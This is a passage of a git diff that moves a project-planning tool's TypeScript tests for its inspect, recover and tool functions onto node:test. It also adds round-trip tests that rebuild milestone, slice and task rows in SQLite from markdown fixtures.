+    assert.match(output, /Artifacts:\s+0/, "zero artifacts");
+    assert.ok(!output.includes("Recent decisions:"), "no recent decisions section when empty");
+    assert.ok(!output.includes("Recent requirements:"), "no recent requirements section when empty");
+  });
 
-  assertMatch(output, /Schema version: 1/, "contains schema version 1");
-  assertMatch(output, /Decisions:\s+0/, "zero decisions");
-  assertMatch(output, /Requirements:\s+0/, "zero requirements");
-  assertMatch(output, /Artifacts:\s+0/, "zero artifacts");
-  assertTrue(!output.includes("Recent decisions:"), "no recent decisions section when empty");
-  assertTrue(!output.includes("Recent requirements:"), "no recent requirements section when empty");
-}
+  test('null schema version', () => {
+    const data: InspectData = {
+      schemaVersion: null,
+      counts: { decisions: 0, requirements: 0, artifacts: 0 },
+      recentDecisions: [],
+      recentRequirements: [],
+    };
 
-// ── handles null schema version ──
-console.log("# === gsd-inspect: null schema version ===");
-{
-  const data: InspectData = {
-    schemaVersion: null,
-    counts: { decisions: 0, requirements: 0, artifacts: 0 },
-    recentDecisions: [],
-    recentRequirements: [],
-  };
+    const output = formatInspectOutput(data);
+    assert.match(output, /Schema version: unknown/, "null version shows as unknown");
+  });
 
-  const output = formatInspectOutput(data);
-  assertMatch(output, /Schema version: unknown/, "null version shows as unknown");
-}
+  test('five recent entries', () => {
+    const data: InspectData = {
+      schemaVersion: 2,
+      counts: { decisions: 5, requirements: 5, artifacts: 0 },
+      recentDecisions: [
+        { id: "D005", decision: "Dec 5", choice: "C5" },
+        { id: "D004", decision: "Dec 4", choice: "C4" },
+        { id: "D003", decision: "Dec 3", choice: "C3" },
+        { id: "D002", decision: "Dec 2", choice: "C2" },
+        { id: "D001", decision: "Dec 1", choice: "C1" },
+      ],
+      recentRequirements: [
+        { id: "R005", status: "active", description: "Req 5" },
+        { id: "R004", status: "done", description: "Req 4" },
+        { id: "R003", status: "active", description: "Req 3" },
+        { id: "R002", status: "active", description: "Req 2" },
+        { id: "R001", status: "done", description: "Req 1" },
+      ],
+    };
 
-// ── formats up to 5 recent entries ──
-console.log("# === gsd-inspect: five recent entries ===");
-{
-  const data: InspectData = {
-    schemaVersion: 2,
-    counts: { decisions: 5, requirements: 5, artifacts: 0 },
-    recentDecisions: [
-      { id: "D005", decision: "Dec 5", choice: "C5" },
-      { id: "D004", decision: "Dec 4", choice: "C4" },
-      { id: "D003", decision: "Dec 3", choice: "C3" },
-      { id: "D002", decision: "Dec 2", choice: "C2" },
-      { id: "D001", decision: "Dec 1", choice: "C1" },
-    ],
-    recentRequirements: [
-      { id: "R005", status: "active", description: "Req 5" },
-      { id: "R004", status: "done", description: "Req 4" },
-      { id: "R003", status: "active", description: "Req 3" },
-      { id: "R002", status: "active", description: "Req 2" },
-      { id: "R001", status: "done", description: "Req 1" },
-    ],
-  };
+    const output = formatInspectOutput(data);
 
-  const output = formatInspectOutput(data);
+    for (let i = 1; i <= 5; i++) {
+      assert.match(output, new RegExp(`D00${i}: Dec ${i} → C${i}`), `contains D00${i}`);
+    }
+    for (let i = 1; i <= 5; i++) {
+      assert.match(output, new RegExp(`R00${i}`), `contains R00${i}`);
+    }
+    assert.match(output, /\[active\]/, "contains active status");
+    assert.match(output, /\[done\]/, "contains done status");
+  });
 
-  for (let i = 1; i <= 5; i++) {
-    assertMatch(output, new RegExp(`D00${i}: Dec ${i} → C${i}`), `contains D00${i}`);
-  }
-  for (let i = 1; i <= 5; i++) {
-    assertMatch(output, new RegExp(`R00${i}`), `contains R00${i}`);
-  }
-  assertMatch(output, /\[active\]/, "contains active status");
-  assertMatch(output, /\[done\]/, "contains done status");
-}
+  test('output format', () => {
+    const data: InspectData = {
+      schemaVersion: 2,
+      counts: { decisions: 1, requirements: 1, artifacts: 0 },
+      recentDecisions: [{ id: "D001", decision: "Test", choice: "Yes" }],
+      recentRequirements: [{ id: "R001", status: "active", description: "Test req" }],
+    };
 
-// ── output is multiline text (not JSON) ──
-console.log("# === gsd-inspect: output format ===");
-{
-  const data: InspectData = {
-    schemaVersion: 2,
-    counts: { decisions: 1, requirements: 1, artifacts: 0 },
-    recentDecisions: [{ id: "D001", decision: "Test", choice: "Yes" }],
-    recentRequirements: [{ id: "R001", status: "active", description: "Test req" }],
-  };
-
-  const output = formatInspectOutput(data);
-  const lines = output.split("\n");
-  assertTrue(lines.length > 5, "output has multiple lines");
-  assertTrue(!output.startsWith("{"), "output is not JSON");
-}
-
-report();
+    const output = formatInspectOutput(data);
+    const lines = output.split("\n");
+    assert.ok(lines.length > 5, "output has multiple lines");
+    assert.ok(!output.startsWith("{"), "output is not JSON");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gsd-recover.test.ts b/src/resources/extensions/gsd/tests/gsd-recover.test.ts
new file mode 100644
index 000000000..4ee0a9c6f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/gsd-recover.test.ts
@@ -0,0 +1,440 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+// gsd-recover.test.ts — Tests for the `gsd recover` recovery logic.
+// Verifies: populate DB → clear hierarchy → recover from markdown → state matches.
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  transaction,
+  getAllMilestones,
+  getMilestoneSlices,
+  getSliceTasks,
+  _getAdapter,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getMilestone,
+  getSlice,
+  getTask,
+} from '../gsd-db.ts';
+import { migrateHierarchyToDb } from '../md-importer.ts';
+import { deriveStateFromDb, invalidateStateCache } from '../state.ts';
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-recover-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, '.gsd', relativePath);
+  mkdirSync(join(full, '..'), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ─── Fixture Content ──────────────────────────────────────────────────────
+
+const ROADMAP_M001 = `# M001: Recovery Test
+
+**Vision:** Test recovery round-trip.
+
+## Success Criteria
+
+- All recovery tests pass
+- State matches after round-trip
+
+
+## Slices
+
+- [x] **S01: Setup** \`risk:low\` \`depends:[]\`
+  > After this: Setup complete.
+
+- [ ] **S02: Core** \`risk:medium\` \`depends:[S01]\`
+  > After this: Core done.
+
+## Boundary Map
+
+| From | To | Produces | Consumes |
+|------|-----|----------|----------|
+| S01 | S02 | setup artifacts | setup artifacts |
+`;
+
+const PLAN_S01_COMPLETE = `---
+estimated_steps: 2
+estimated_files: 1
+skills_used: []
+---
+
+# S01: Setup
+
+**Goal:** Setup fixtures.
+**Demo:** Tasks done.
+
+## Tasks
+
+- [x] **T01: Init** \`est:15m\`
+  Initialize things.
+  - Files: \`init.ts\`, \`config.ts\`
+  - Verify: \`node test-init.ts\`
+
+- [x] **T02: Config** \`est:10m\`
+  Configure things.
+  - Files: \`settings.ts\`
+  - Verify: \`node test-config.ts\`
+`;
+
+const PLAN_S02_PARTIAL = `---
+estimated_steps: 1
+estimated_files: 1
+skills_used: []
+---
+
+# S02: Core
+
+**Goal:** Build core.
+**Demo:** Core works.
+
+## Tasks
+
+- [x] **T01: Build** \`est:30m\`
+  Build it.
+  - Files: \`core.ts\`
+  - Verify: \`node test-build.ts\`
+
+- [ ] **T02: Test** \`est:20m\`
+  Test it.
+  - Files: \`test-core.ts\`, \`helpers.ts\`
+  - Verify: \`npm test\`
+
+- [ ] **T03: Polish** \`est:15m\`
+  Polish it.
+  - Files: \`polish.ts\`
+  - Verify: \`node test-polish.ts\`
+`;
+
+const SUMMARY_S01 = `---
+id: S01
+parent: M001
+milestone: M001
+---
+
+# S01: Setup — Summary
+
+Setup is complete.
+`;
+
+// ─── Recovery helpers (mirrors gsd recover handler logic) ─────────────────
+
+function clearHierarchyTables(): void {
+  const db = _getAdapter()!;
+  transaction(() => {
+    db.exec("DELETE FROM tasks");
+    db.exec("DELETE FROM slices");
+    db.exec("DELETE FROM milestones");
+  });
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+describe('gsd-recover', async () => {
+  test('full round-trip (populate, clear, recover, verify)', async () => {
+    const base = createFixtureBase();
+    try {
+      // Set up markdown fixtures
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_M001);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_COMPLETE);
+      writeFile(base, 'milestones/M001/slices/S01/S01-SUMMARY.md', SUMMARY_S01);
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', PLAN_S02_PARTIAL);
+
+      // Step 1: Open DB and populate from markdown
+      openDatabase(':memory:');
+      const counts1 = migrateHierarchyToDb(base);
+      assert.deepStrictEqual(counts1.milestones, 1, 'round-trip: initial migration - 1 milestone');
+      assert.deepStrictEqual(counts1.slices, 2, 'round-trip: initial migration - 2 slices');
+      assert.ok(counts1.tasks >= 5, 'round-trip: initial migration - at least 5 tasks');
+
+      // Step 2: Capture state from DB before clearing
+      invalidateStateCache();
+      const stateBefore = await deriveStateFromDb(base);
+      assert.ok(stateBefore.activeMilestone !== null, 'round-trip: state before has active milestone');
+      const milestonesBefore = getAllMilestones();
+      const slicesBefore = getMilestoneSlices('M001');
+      const s01TasksBefore = getSliceTasks('M001', 'S01');
+      const s02TasksBefore = getSliceTasks('M001', 'S02');
+
+      // Step 3: Clear hierarchy tables
+      clearHierarchyTables();
+      const milestonesAfterClear = getAllMilestones();
+      assert.deepStrictEqual(milestonesAfterClear.length, 0, 'round-trip: milestones cleared');
+
+      // Step 4: Recover from markdown
+      const counts2 = migrateHierarchyToDb(base);
+      assert.deepStrictEqual(counts2.milestones, counts1.milestones, 'round-trip: recovery milestone count matches');
+      assert.deepStrictEqual(counts2.slices, counts1.slices, 'round-trip: recovery slice count matches');
+      assert.deepStrictEqual(counts2.tasks, counts1.tasks, 'round-trip: recovery task count matches');
+
+      // Step 5: Verify state matches
+      invalidateStateCache();
+      const stateAfter = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(stateAfter.phase, stateBefore.phase, 'round-trip: phase matches');
+      assert.deepStrictEqual(
+        stateAfter.activeMilestone?.id,
+        stateBefore.activeMilestone?.id,
+        'round-trip: active milestone ID matches',
+      );
+      assert.deepStrictEqual(
+        stateAfter.activeSlice?.id,
+        stateBefore.activeSlice?.id,
+        'round-trip: active slice ID matches',
+      );
+      assert.deepStrictEqual(
+        stateAfter.activeTask?.id,
+        stateBefore.activeTask?.id,
+        'round-trip: active task ID matches',
+      );
+
+      // Verify row-level data matches
+      const milestonesAfter = getAllMilestones();
+      assert.deepStrictEqual(milestonesAfter.length, milestonesBefore.length, 'round-trip: milestone row count');
+      assert.deepStrictEqual(milestonesAfter[0]?.id, milestonesBefore[0]?.id, 'round-trip: milestone ID');
+      assert.deepStrictEqual(milestonesAfter[0]?.title, milestonesBefore[0]?.title, 'round-trip: milestone title');
+
+      const slicesAfter = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slicesAfter.length, slicesBefore.length, 'round-trip: slice row count');
+      assert.deepStrictEqual(slicesAfter[0]?.id, slicesBefore[0]?.id, 'round-trip: S01 ID');
+      assert.deepStrictEqual(slicesAfter[0]?.status, slicesBefore[0]?.status, 'round-trip: S01 status');
+      assert.deepStrictEqual(slicesAfter[1]?.id, slicesBefore[1]?.id, 'round-trip: S02 ID');
+
+      const s01TasksAfter = getSliceTasks('M001', 'S01');
+      assert.deepStrictEqual(s01TasksAfter.length, s01TasksBefore.length, 'round-trip: S01 task count');
+
+      const s02TasksAfter = getSliceTasks('M001', 'S02');
+      assert.deepStrictEqual(s02TasksAfter.length, s02TasksBefore.length, 'round-trip: S02 task count');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test('v8 planning columns populated', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_M001);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_COMPLETE);
+      writeFile(base, 'milestones/M001/slices/S01/S01-SUMMARY.md', SUMMARY_S01);
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', PLAN_S02_PARTIAL);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      // Milestone planning columns
+      const milestone = getMilestone('M001');
+      assert.ok(milestone !== null, 'v8: milestone exists');
+      assert.deepStrictEqual(milestone!.vision, 'Test recovery round-trip.', 'v8: milestone vision populated');
+      assert.ok(milestone!.success_criteria.length >= 2, 'v8: milestone success_criteria has entries');
+      assert.deepStrictEqual(milestone!.success_criteria[0], 'All recovery tests pass', 'v8: first success criterion');
+      assert.ok(milestone!.boundary_map_markdown.includes('Boundary Map'), 'v8: boundary_map_markdown populated');
+      assert.ok(milestone!.boundary_map_markdown.includes('S01'), 'v8: boundary_map_markdown has S01');
+
+      // Tool-only fields left empty per D004
+      assert.deepStrictEqual(milestone!.key_risks.length, 0, 'v8: key_risks left empty (tool-only per D004)');
+      assert.deepStrictEqual(milestone!.requirement_coverage, '', 'v8: requirement_coverage left empty (tool-only per D004)');
+
+      // Slice planning columns
+      const sliceS01 = getSlice('M001', 'S01');
+      assert.ok(sliceS01 !== null, 'v8: slice S01 exists');
+      assert.deepStrictEqual(sliceS01!.goal, 'Setup fixtures.', 'v8: S01 goal populated');
+
+      const sliceS02 = getSlice('M001', 'S02');
+      assert.ok(sliceS02 !== null, 'v8: slice S02 exists');
+      assert.deepStrictEqual(sliceS02!.goal, 'Build core.', 'v8: S02 goal populated');
+
+      // Slice tool-only fields left empty per D004
+      assert.deepStrictEqual(sliceS01!.proof_level, '', 'v8: S01 proof_level left empty (tool-only per D004)');
+
+      // Task planning columns - S01/T01
+      const taskS01T01 = getTask('M001', 'S01', 'T01');
+      assert.ok(taskS01T01 !== null, 'v8: task S01/T01 exists');
+      assert.ok(taskS01T01!.files.length >= 2, 'v8: S01/T01 files populated');
+      assert.ok(taskS01T01!.files.includes('init.ts'), 'v8: S01/T01 files includes init.ts');
+      assert.ok(taskS01T01!.files.includes('config.ts'), 'v8: S01/T01 files includes config.ts');
+      assert.deepStrictEqual(taskS01T01!.verify, '`node test-init.ts`', 'v8: S01/T01 verify populated');
+
+      // Task planning columns - S02/T02
+      const taskS02T02 = getTask('M001', 'S02', 'T02');
+      assert.ok(taskS02T02 !== null, 'v8: task S02/T02 exists');
+      assert.ok(taskS02T02!.files.length >= 2, 'v8: S02/T02 files populated');
+      assert.ok(taskS02T02!.files.includes('test-core.ts'), 'v8: S02/T02 files includes test-core.ts');
+      assert.deepStrictEqual(taskS02T02!.verify, '`npm test`', 'v8: S02/T02 verify populated');
+
+      const taskS02T03 = getTask('M001', 'S02', 'T03');
+      assert.ok(taskS02T03 !== null, 'v8: task S02/T03 exists');
+      assert.ok(taskS02T03!.files.includes('polish.ts'), 'v8: S02/T03 files includes polish.ts');
+      assert.deepStrictEqual(taskS02T03!.verify, '`node test-polish.ts`', 'v8: S02/T03 verify populated');
+
+      // Diagnostic: v8 planning columns queryable via SQL
+      const db = _getAdapter()!;
+      const milestoneRow = db.prepare("SELECT vision, success_criteria, boundary_map_markdown FROM milestones WHERE id = 'M001'").get() as any;
+      assert.ok(milestoneRow.vision.length > 0, 'v8-diag: vision column queryable');
+      assert.ok(milestoneRow.boundary_map_markdown.length > 0, 'v8-diag: boundary_map_markdown column queryable');
+
+      const sliceRow = db.prepare("SELECT goal FROM slices WHERE milestone_id = 'M001' AND id = 'S01'").get() as any;
+      assert.ok(sliceRow.goal.length > 0, 'v8-diag: goal column queryable');
+
+      const taskRow = db.prepare("SELECT files, verify FROM tasks WHERE milestone_id = 'M001' AND slice_id = 'S01' AND id = 'T01'").get() as any;
+      assert.ok(taskRow.files.length > 2, 'v8-diag: files column queryable (JSON array)');
+      assert.ok(taskRow.verify.length > 0, 'v8-diag: verify column queryable');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test('idempotent - double recovery produces same state', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_M001);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_COMPLETE);
+      writeFile(base, 'milestones/M001/slices/S01/S01-SUMMARY.md', SUMMARY_S01);
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', PLAN_S02_PARTIAL);
+
+      openDatabase(':memory:');
+
+      // First recovery
+      migrateHierarchyToDb(base);
+      invalidateStateCache();
+      const state1 = await deriveStateFromDb(base);
+
+      // Clear and recover again
+      clearHierarchyTables();
+      migrateHierarchyToDb(base);
+      invalidateStateCache();
+      const state2 = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state2.phase, state1.phase, 'idempotent: phase matches');
+      assert.deepStrictEqual(
+        state2.activeMilestone?.id,
+        state1.activeMilestone?.id,
+        'idempotent: active milestone matches',
+      );
+      assert.deepStrictEqual(
+        state2.activeSlice?.id,
+        state1.activeSlice?.id,
+        'idempotent: active slice matches',
+      );
+      assert.deepStrictEqual(
+        state2.activeTask?.id,
+        state1.activeTask?.id,
+        'idempotent: active task matches',
+      );
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test('preserves decisions/requirements', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_M001);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_COMPLETE);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      // Insert a decision and requirement manually
+      const db = _getAdapter()!;
+      db.prepare(
+        `INSERT INTO decisions (id, when_context, scope, decision, choice, rationale, revisable)
+         VALUES (:id, :when, :scope, :decision, :choice, :rationale, :revisable)`,
+      ).run({
+        ':id': 'D001',
+        ':when': 'T03',
+        ':scope': 'architecture',
+        ':decision': 'Use shared WAL',
+        ':choice': 'Single DB',
+        ':rationale': 'Simpler',
+        ':revisable': 'Yes',
+      });
+
+      db.prepare(
+        `INSERT INTO requirements (id, class, status, description)
+         VALUES (:id, :class, :status, :desc)`,
+      ).run({
+        ':id': 'R001',
+        ':class': 'functional',
+        ':status': 'active',
+        ':desc': 'Recovery works',
+      });
+
+      // Clear hierarchy only
+      clearHierarchyTables();
+
+      // Verify decisions and requirements survived
+      const decisions = db.prepare('SELECT * FROM decisions').all();
+      assert.deepStrictEqual(decisions.length, 1, 'preserve: decision survives clear');
+      assert.deepStrictEqual((decisions[0] as any).id, 'D001', 'preserve: decision ID intact');
+
+      const requirements = db.prepare('SELECT * FROM requirements').all();
+      assert.deepStrictEqual(requirements.length, 1, 'preserve: requirement survives clear');
+      assert.deepStrictEqual((requirements[0] as any).id, 'R001', 'preserve: requirement ID intact');
+
+      // Recover hierarchy
+      migrateHierarchyToDb(base);
+      const milestones = getAllMilestones();
+      assert.ok(milestones.length > 0, 'preserve: milestones recovered after clear');
+
+      // Verify non-hierarchy data still intact after recovery
+      const decisionsAfter = db.prepare('SELECT * FROM decisions').all();
+      assert.deepStrictEqual(decisionsAfter.length, 1, 'preserve: decision still present after recovery');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  test('empty milestones dir', async () => {
+    const base = createFixtureBase();
+    try {
+      // No milestones written - just the empty dir
+      openDatabase(':memory:');
+
+      // Pre-populate to simulate existing state
+      insertMilestone({ id: 'M001', title: 'Ghost', status: 'active' });
+
+      // Clear and recover from empty
+      clearHierarchyTables();
+      const counts = migrateHierarchyToDb(base);
+      assert.deepStrictEqual(counts.milestones, 0, 'empty: zero milestones recovered');
+      assert.deepStrictEqual(counts.slices, 0, 'empty: zero slices recovered');
+      assert.deepStrictEqual(counts.tasks, 0, 'empty: zero tasks recovered');
+
+      const all = getAllMilestones();
+      assert.deepStrictEqual(all.length, 0, 'empty: no milestones in DB after recovery');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gsd-tools.test.ts b/src/resources/extensions/gsd/tests/gsd-tools.test.ts
index 12f8b4168..695a3b235 100644
--- a/src/resources/extensions/gsd/tests/gsd-tools.test.ts
+++ b/src/resources/extensions/gsd/tests/gsd-tools.test.ts
@@ -1,9 +1,10 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 // gsd-tools — Structured LLM tool tests
 //
 // Tests the three registered tools: gsd_decision_save, gsd_requirement_update, gsd_summary_save.
 // Each tool is tested via direct function invocation against an in-memory DB.
 
-import { createTestContext } from './test-helpers.ts';
 import * as path from 'node:path';
 import * as os from 'node:os';
 import * as fs from 'node:fs';
@@ -20,13 +21,13 @@ import {
 import {
   saveDecisionToDb,
   updateRequirementInDb,
+  saveRequirementToDb,
   saveArtifactToDb,
   nextDecisionId,
+  nextRequirementId,
 } from '../db-writer.ts';
 import type { Requirement } from '../types.ts';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
 // ═══════════════════════════════════════════════════════════════════════════
 // Helpers
 // ═══════════════════════════════════════════════════════════════════════════
@@ -46,281 +47,395 @@ function cleanupDir(dir: string): void {
 /**
  * Simulate tool execute by calling the underlying DB functions directly.
  * The actual tool registration happens in index.ts; here we test the
- * execute logic pattern: check DB → call writer → return result.
+ * execute logic pattern: check DB -> call writer -> return result.
  */
 
-// ═══════════════════════════════════════════════════════════════════════════
-// gsd_decision_save tool tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── gsd_decision_save ──');
-
-{
-  const tmpDir = makeTmpDir();
-  try {
-    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-    openDatabase(dbPath);
-    assertTrue(isDbAvailable(), 'DB should be available after open');
-
-    // (a) Decision tool creates DB row + returns new ID
-    const result = await saveDecisionToDb(
-      {
-        scope: 'architecture',
-        decision: 'Use SQLite for metadata',
-        choice: 'SQLite',
-        rationale: 'Sync API fits the CLI model',
-        revisable: 'Yes',
-        when_context: 'M001',
-      },
-      tmpDir,
-    );
-
-    assertEq(result.id, 'D001', 'First decision should be D001');
-
-    // Verify DB row exists
-    const row = getDecisionById('D001');
-    assertTrue(row !== null, 'Decision D001 should exist in DB');
-    assertEq(row!.scope, 'architecture', 'Decision scope should match');
-    assertEq(row!.decision, 'Use SQLite for metadata', 'Decision text should match');
-    assertEq(row!.choice, 'SQLite', 'Decision choice should match');
-
-    // Verify DECISIONS.md was generated
-    const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
-    assertTrue(fs.existsSync(mdPath), 'DECISIONS.md should be created');
-    const mdContent = fs.readFileSync(mdPath, 'utf-8');
-    assertTrue(mdContent.includes('D001'), 'DECISIONS.md should contain D001');
-    assertTrue(mdContent.includes('SQLite'), 'DECISIONS.md should contain choice');
-
-    // (e) Decision tool auto-assigns correct next ID
-    const result2 = await saveDecisionToDb(
-      {
-        scope: 'testing',
-        decision: 'Test runner',
-        choice: 'vitest',
-        rationale: 'Fast and ESM-native',
-      },
-      tmpDir,
-    );
-    assertEq(result2.id, 'D002', 'Second decision should be D002');
-
-    const result3 = await saveDecisionToDb(
-      {
-        scope: 'CI',
-        decision: 'CI platform',
-        choice: 'GitHub Actions',
-        rationale: 'Integrated with repo',
-      },
-      tmpDir,
-    );
-    assertEq(result3.id, 'D003', 'Third decision should be D003');
-
-    closeDatabase();
-  } finally {
-    cleanupDir(tmpDir);
-  }
-}
-
-// ═══════════════════════════════════════════════════════════════════════════
-// gsd_requirement_update tool tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n── gsd_requirement_update ──');
-
-{
-  const tmpDir = makeTmpDir();
-  try {
-    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-    openDatabase(dbPath);
-
-    // Seed a requirement
-    const seedReq: Requirement = {
-      id: 'R001',
-      class: 'functional',
-      status: 'active',
-      description: 'Must support SQLite storage',
-      why: 'Structured data needs',
-      source: 'design',
-      primary_owner: 'S03',
-      supporting_slices: '',
-      validation: '',
-      notes: '',
-      full_content: '',
-      superseded_by: null,
-    };
-    upsertRequirement(seedReq);
-
-    // (b) Requirement update tool modifies existing requirement
-    await updateRequirementInDb(
-      'R001',
-      { status: 'validated', validation: 'Unit tests pass', notes: 'Verified in S06' },
-      tmpDir,
-    );
-
-    const updated = getRequirementById('R001');
-    assertTrue(updated !== null, 'R001 should still exist');
-    assertEq(updated!.status, 'validated', 'Status should be updated');
-    assertEq(updated!.validation, 'Unit tests pass', 'Validation should be updated');
-    assertEq(updated!.notes, 'Verified in S06', 'Notes should be updated');
-    // Original fields preserved
-    assertEq(updated!.description, 'Must support SQLite storage', 'Description should be preserved');
-    assertEq(updated!.primary_owner, 'S03', 'Primary owner should be preserved');
-
-    // Verify REQUIREMENTS.md was generated
-    const mdPath = path.join(tmpDir, '.gsd', 'REQUIREMENTS.md');
-    assertTrue(fs.existsSync(mdPath), 'REQUIREMENTS.md should be created');
-    const mdContent = fs.readFileSync(mdPath, 'utf-8');
-    assertTrue(mdContent.includes('R001'), 'REQUIREMENTS.md should contain R001');
-    assertTrue(mdContent.includes('validated'), 'REQUIREMENTS.md should reflect updated status');
-
-    // Updating non-existent requirement throws
-    let threwForMissing = false;
+describe('gsd-tools', () => {
+  test('gsd_decision_save', async () => {
+    const tmpDir = makeTmpDir();
     try {
-      await updateRequirementInDb('R999', { status: 'deferred' }, tmpDir);
-    } catch (err) {
-      threwForMissing = true;
-      assertTrue(
-        (err as Error).message.includes('R999'),
-        'Error should mention the missing requirement ID',
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
+      assert.ok(isDbAvailable(), 'DB should be available after open');
+
+      // (a) Decision tool creates DB row + returns new ID
+      const result = await saveDecisionToDb(
+        {
+          scope: 'architecture',
+          decision: 'Use SQLite for metadata',
+          choice: 'SQLite',
+          rationale: 'Sync API fits the CLI model',
+          revisable: 'Yes',
+          when_context: 'M001',
+        },
+        tmpDir,
       );
+
+      assert.deepStrictEqual(result.id, 'D001', 'First decision should be D001');
+
+      // Verify DB row exists
+      const row = getDecisionById('D001');
+      assert.ok(row !== null, 'Decision D001 should exist in DB');
+      assert.deepStrictEqual(row!.scope, 'architecture', 'Decision scope should match');
+      assert.deepStrictEqual(row!.decision, 'Use SQLite for metadata', 'Decision text should match');
+      assert.deepStrictEqual(row!.choice, 'SQLite', 'Decision choice should match');
+
+      // Verify DECISIONS.md was generated
+      const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
+      assert.ok(fs.existsSync(mdPath), 'DECISIONS.md should be created');
+      const mdContent = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(mdContent.includes('D001'), 'DECISIONS.md should contain D001');
+      assert.ok(mdContent.includes('SQLite'), 'DECISIONS.md should contain choice');
+
+      // (e) Decision tool auto-assigns correct next ID
+      const result2 = await saveDecisionToDb(
+        {
+          scope: 'testing',
+          decision: 'Test runner',
+          choice: 'vitest',
+          rationale: 'Fast and ESM-native',
+        },
+        tmpDir,
+      );
+      assert.deepStrictEqual(result2.id, 'D002', 'Second decision should be D002');
+
+      const result3 = await saveDecisionToDb(
+        {
+          scope: 'CI',
+          decision: 'CI platform',
+          choice: 'GitHub Actions',
+          rationale: 'Integrated with repo',
+        },
+        tmpDir,
+      );
+      assert.deepStrictEqual(result3.id, 'D003', 'Third decision should be D003');
+
+      closeDatabase();
+    } finally {
+      cleanupDir(tmpDir);
     }
-    assertTrue(threwForMissing, 'Should throw for non-existent requirement');
+  });
 
-    closeDatabase();
-  } finally {
-    cleanupDir(tmpDir);
-  }
-}
+  test('gsd_requirement_update', async () => {
+    const tmpDir = makeTmpDir();
+    try {
+      const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+      openDatabase(dbPath);
 
-// ═══════════════════════════════════════════════════════════════════════════
-// gsd_summary_save tool tests
-// ═══════════════════════════════════════════════════════════════════════════
+      // Seed a requirement
+      const seedReq: Requirement = {
+        id: 'R001',
+        class: 'functional',
+        status: 'active',
+        description: 'Must support SQLite storage',
+        why: 'Structured data needs',
+        source: 'design',
+        primary_owner: 'S03',
+        supporting_slices: '',
+        validation: '',
+        notes: '',
+        full_content: '',
+        superseded_by: null,
+      };
+      upsertRequirement(seedReq);
 
-console.log('\n── gsd_summary_save ──');
+      // (b) Requirement update tool modifies existing requirement
+      await updateRequirementInDb(
+        'R001',
+        { status: 'validated', validation: 'Unit tests pass', notes: 'Verified in S06' },
+        tmpDir,
+      );
 
-{
-  const tmpDir = makeTmpDir();
-  try {
-    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
-    openDatabase(dbPath);
+      const updated = getRequirementById('R001');
+      assert.ok(updated !== null, 'R001 should still exist');
+      assert.deepStrictEqual(updated!.status, 'validated', 'Status should be updated');
+      assert.deepStrictEqual(updated!.validation, 'Unit tests pass', 'Validation should be updated');
+      assert.deepStrictEqual(updated!.notes, 'Verified in S06', 'Notes should be updated');
+      // Original fields preserved
+      assert.deepStrictEqual(updated!.description, 'Must support SQLite storage', 'Description should be preserved');
+      assert.deepStrictEqual(updated!.primary_owner, 'S03', 'Primary owner should be preserved');
 
-    // (c) Summary tool creates artifact row
-    await saveArtifactToDb(
-      {
-        path: 'milestones/M001/slices/S01/S01-SUMMARY.md',
-        artifact_type: 'SUMMARY',
-        content: '# S01 Summary\n\nThis is a test summary.',
-        milestone_id: 'M001',
